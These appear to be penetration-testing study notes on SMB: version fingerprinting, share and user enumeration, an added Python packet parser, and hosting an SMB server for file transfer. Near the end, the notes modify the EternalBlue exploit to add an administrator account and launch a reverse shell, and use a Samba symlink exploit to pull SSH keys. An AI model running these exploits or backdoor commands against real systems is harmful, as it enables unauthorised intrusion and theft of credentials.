SMB Server Enumeration

FIND SMB VERSION

…this can be done by watching the traffic in Wireshark
…or with the techniques below

SMB1 – Windows 2000, XP and Windows 2003
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.


…keeping this for reference: sniff the VPN interface while connecting to the target (e.g. with smbclient) and grep for the Samba banner the server sends back; the .? between the letters allows for the NUL byte that follows each character when the strings are UTF-16 encoded, so it also catches SMB v2 hosts

sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'

# THEN GIVES OUTPUT... LOOK FOR VERSION NUMBERS
interface: tun0 (192.168.119.0/255.255.255.0)
filter: (ip || ip6)
match (JIT): s.?a.?m.?b.?a.*[[:digit:]]

T 192.168.119.299:36106 -> 10.11.10.299:139 [AP] #10
  .....SMBr.....C.........................MICROSOFT NETWORKS 3.0..LANMAN1.0..LM1.2X002..DOS LANMAN2.1..LANMAN2.1..Samba..NT LANMAN 1.0..NT LM 0.12..SMB 2.002..SMB 2.???.
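Added example (Python, not part of these notes): parsers for the three messages the fingerprinting above relies on, run against packets the script constructs itself rather than real captures. The SMB1 NEGOTIATE request carries the dialect list seen in the ngrep output (the "SMB 2.002" / "SMB 2.???" entries are the client offering to upgrade to SMB2), the SMB1 SESSION SETUP ANDX response carries the NativeLanMan string where Samba puts "Samba <version>" (UTF-16LE when Unicode was negotiated, which is what the .? in the regex tolerates), and the SMB2 NEGOTIATE response carries the 16-bit dialect the server actually picked plus whether it requires signing. Assumptions beyond the notes: the field layouts from MS-CIFS/MS-SMB2, the two dialects later than the version table (3.0.2, 3.1.1), and the sample banner "Samba 3.0.20-Debian", which is made up for the demo.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
SMB_COM_SESSION_SETUP_ANDX = 0x73
FLAGS2_UNICODE = 0x8000
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x02

# SMB2 DialectRevision -> version. The first three rows match the version table
# in these notes; 0x0302 and 0x0311 are later Windows releases (assumption: added here).
SMB2_DIALECTS = {
    0x0202: "SMB 2.0.2 (Windows Vista SP1 / Server 2008)",
    0x0210: "SMB 2.1 (Windows 7 / Server 2008 R2)",
    0x0300: "SMB 3.0 (Windows 8 / Server 2012)",
    0x0302: "SMB 3.0.2 (Windows 8.1 / Server 2012 R2)",
    0x0311: "SMB 3.1.1 (Windows 10 / Server 2016)",
}


def _strip_netbios(raw):
    """NetBIOS session header: 1 byte type (0x00) + 3-byte big-endian length."""
    length = struct.unpack(">I", raw[:4])[0] & 0x00FFFFFF
    return raw[4:4 + length]


def _smb1_body(smb, command):
    """Check the 32-byte SMB1 header and return (flags2, data bytes, data offset)."""
    if smb[:4] != SMB1_MAGIC or smb[4] != command:
        raise ValueError("not the expected SMB1 command")
    flags2 = struct.unpack_from("<H", smb, 10)[0]
    word_count = smb[32]
    data_off = 33 + 2 * word_count            # skip WordCount and the parameter words
    byte_count = struct.unpack_from("<H", smb, data_off)[0]
    data_off += 2                             # skip ByteCount
    return flags2, smb[data_off:data_off + byte_count], data_off


def smb1_negotiate_dialects(raw):
    """Dialects offered in an SMB1 NEGOTIATE request: each is 0x02 + NUL-terminated ASCII."""
    _, data, _ = _smb1_body(_strip_netbios(raw), SMB_COM_NEGOTIATE)
    return [d[1:].decode("ascii") for d in data.split(b"\x00") if d[:1] == b"\x02"]


def smb1_session_setup_banner(raw):
    """NativeOS / NativeLanMan / PrimaryDomain from a SESSION SETUP ANDX response."""
    flags2, data, data_off = _smb1_body(_strip_netbios(raw), SMB_COM_SESSION_SETUP_ANDX)
    if flags2 & FLAGS2_UNICODE:
        if data_off % 2:                      # a pad byte aligns UTF-16 strings to an even offset
            data = data[1:]
        fields = data[:len(data) // 2 * 2].decode("utf-16-le").split("\x00")
    else:
        fields = data.decode("ascii", "replace").split("\x00")
    return dict(zip(("native_os", "native_lanman", "primary_domain"), fields))


def smb2_negotiate_result(raw):
    """(DialectRevision, version name, signing_required) from an SMB2 NEGOTIATE response."""
    smb = _strip_netbios(raw)
    if smb[:4] != SMB2_MAGIC or struct.unpack_from("<H", smb, 12)[0] != 0:
        raise ValueError("not an SMB2 NEGOTIATE")
    security_mode, dialect = struct.unpack_from("<HH", smb, 66)   # body starts at 64
    signing_required = bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED)
    return dialect, SMB2_DIALECTS.get(dialect, "unknown"), signing_required


# --- constructed sample packets (not captures) -------------------------------

def _netbios(smb):
    return struct.pack(">I", len(smb)) + smb


def _smb1_header(command, flags2=0xC853):   # 0xC853 includes FLAGS2_UNICODE
    return struct.pack("<4sBIBHH8sHHHHH", SMB1_MAGIC, command, 0, 0x18, flags2,
                       0, b"\x00" * 8, 0, 0, 0, 0, 0)


def build_negotiate_request(dialects):
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    return _netbios(_smb1_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(data)) + data)


def build_session_setup_response(native_os, native_lanman, domain):
    words = struct.pack("<BBHH", 0xFF, 0, 0, 0)   # WordCount 3: no AndX, Action 0
    text = "".join(s + "\x00" for s in (native_os, native_lanman, domain)).encode("utf-16-le")
    data = b"\x00" + text                         # pad byte: 32 + 1 + 6 + 2 = 41 is odd
    return _netbios(_smb1_header(SMB_COM_SESSION_SETUP_ANDX) + b"\x03" + words
                    + struct.pack("<H", len(data)) + data)


def build_smb2_negotiate_response(dialect, security_mode):
    hdr = struct.pack("<4sHHIHHIIQIIQ16s", SMB2_MAGIC, 64, 0, 0, 0, 1, 0x1,
                      0, 0, 0, 0, 0, b"\x00" * 16)   # Flags 0x1 = server response
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0, b"\x00" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 0x80, 0, 0)
    return _netbios(hdr + body)


if __name__ == "__main__":
    print(smb1_negotiate_dialects(build_negotiate_request(["NT LM 0.12", "SMB 2.002", "SMB 2.???"])))
    print(smb1_session_setup_banner(build_session_setup_response("Unix", "Samba 3.0.20-Debian", "WORKGROUP")))
    print(smb2_negotiate_result(build_smb2_negotiate_response(0x0210, 0x01)))
```

The signing flag is the check worth keeping from the SMB2 parse: a server that negotiates SMB2/3 without requiring signing is the one an NTLM relay attack can be pointed at, which is a finding on its own even when no version-specific vulnerability applies.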


ENUM4LINUX

enum4linux -a ip nbtscan ip



SCAN FOR VULNERABILITIES

…this uses the Nmap Scripting Engine (NSE)

nmap --script 'smb-vuln*' -p 139,445 ip   # QUOTE THE GLOB SO THE SHELL DOESN'T EXPAND IT
# MAY ALSO INSPECT THROUGH WIRESHARK
# SMB v2 ISN'T ALWAYS DETECTABLE
# EXAMPLE EXPLOIT AFTER FINDING SAMBA 2.2.x IN WIRESHARK
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.c
# MAY FIND SOME USERS
nmap -sT -Pn --script smb-enum-users -p139,445 10.10.1.229


LIST SERVER SHARES

…sometimes there is anonymous information
…other times it requires authentication

smbmap -H ip/hostname

# MULTIPLE COMMANDS (NULL SESSION)
rpcclient -U "" -N ip
    srvinfo          # OS
    netshareenumall  # SHARES
    enumdomusers     # USERS
    getdompwinfo     # POLICIES

# ALSO MULTIPLE COMMANDS (type help)
smbclient //ip/share-name
smbclient -L ip                  # LIST SHARES; IF THIS ERRORS ON AN SMBv1 SERVER, REMOVE -L AND CONNECT TO A SHARE DIRECTLY
smbclient //ip/folder -U user
# MOUNT THE DRIVE
sudo mount -t cifs -o username=user //ip/folder /mnt/smb/
# COPY FILES (CAUTION - NETWORK SPEED)
cp -r /mnt/smb/* ./local/folder

…or just try to list the shares

smbmap -H ip/hostname
echo exit | smbclient -L ip      # OR: smbclient -N -L ip (NO PASSWORD PROMPT)
nmap --script smb-enum-shares -p 139,445 ip


CREATE AN SMB SERVER

…do this on Kali to transfer files
…run the impacket server from outside the shared folder

mkdir servingfolder
impacket-smbserver share servingfolder   # SHARE NAME FIRST, THEN THE FOLDER; ADD -smb2support FOR CURRENT WINDOWS CLIENTS

…or use the built-in Samba server to host your files
…this can be useful when Windows gives errors against the impacket server

sudo systemctl start smbd


CONNECT TO YOUR SERVER

…sometimes you don't need any authentication
…at other times, you may want it

copy \\ip\share\file c:\tmp

…with authentication, add the “net use” command
…you may want to create a user other than kali

net use \\ip\share /user:kali password


BREAKDOWN OF HOW TO CREATE THE SMB SERVER

impacket-smbserver <sharename> <folder>
impacket-smbserver -smb2support <sharename> <folder>   # SMB2 IS NEEDED BY MODERN WINDOWS CLIENTS

# CAN ALSO USE SMBD - NEEDS CONFIGURATION FOR A PUBLIC FOLDER
# CREATE THE USER ON KALI
sudo adduser user
sudo smbpasswd -a user

# ADD TO /etc/samba/smb.conf
# (writable = yes IS THE SAME AS read only = no, AND public = yes THE SAME AS guest ok = yes;
#  guest ok MEANS ANYONE WHO CAN REACH THE BOX CAN WRITE HERE, SO ONLY RUN THIS ON THE LAB VPN)
[catch]
    path = /home/kali/OSCP/TOOLS/uploads/catch
    browseable = yes
    read only = no
    writable = yes
    guest ok = yes
    public = yes
    create mask = 0644
    directory mask = 0755
    force user = achilles   # MUST BE AN EXISTING LOCAL USER THAT OWNS THE PATH

# START SERVICE
sudo service smbd start


ETERNAL BLUE

… a common exploit used with earlier versions of Windows SMB
… searchsploit has a great exploit, 42315.py (see below)
    (read the exploit… it imports mysmb.py, which must be downloaded alongside it)
… also, see this for great scripts regarding Eternal Blue

# SMB (MS17-010 - ETERNAL BLUE)
# SEARCHSPLOIT 42315.py
# INSERTED INTO THE EXPLOIT AROUND LINE 900
# ADDS A USER, THEN REMOTE IN TO GRAB THE BINARY
# THEN RUN EXPLOIT AGAIN TO TRIGGER BINARY
service_exec(conn, r'cmd /c net user blue pass /add')
service_exec(conn, r'cmd /c net localgroup administrators blue /add')
# THEN CHANGED THE COMMANDS TO RUN THE REVERSE SHELL
service_exec(conn, r'cmd /c c:\tmp\reverse_80.exe')


SMB SYMLINK VULNERABILITY

… was a very difficult hack to find!
… this is the CVE to reference

# A WRITABLE "User Share" WAS FOUND ON THE SERVER
# THIS CREATES A SYMLINK IN THE SHARE THAT POINTS AT THE SERVER'S FILESYSTEM ROOT
./exploit 10.11.1.136 "User Share" link '../../../../../../../../../../'
# THEN GRAB THE INFORMATION THROUGH THE LINK
smbget smb://10.11.1.136/"User Share"/link/var/backups/ssh/authorized_keys

